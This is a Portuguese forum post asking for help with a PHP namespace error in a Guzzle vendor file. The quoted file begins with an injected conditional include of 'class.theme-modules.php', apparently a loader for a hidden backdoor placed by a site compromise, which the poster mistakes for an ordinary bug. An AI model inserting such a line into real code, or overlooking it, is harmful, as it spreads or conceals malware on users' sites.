Namespace - Alguem me ajuda
Por gentileza pessoal, acabo de instalar um sistema em minha hospedagem, mas esta apresentando este erro:
Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in public_html/project/vendor/guzzlehttp/promises/src/functions.php on line 1
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php namespace GuzzleHttp\Promise;
function queue(TaskQueueInterface $assign = null)
{
static $queue;
if ($assign) {
$queue = $assign;
} elseif (!$queue) {
$queue = new TaskQueue();
}
return $queue;
}
Alguem sabe como resolver esta questão?
Agradeço.Discussão (3)
Carregando comentários...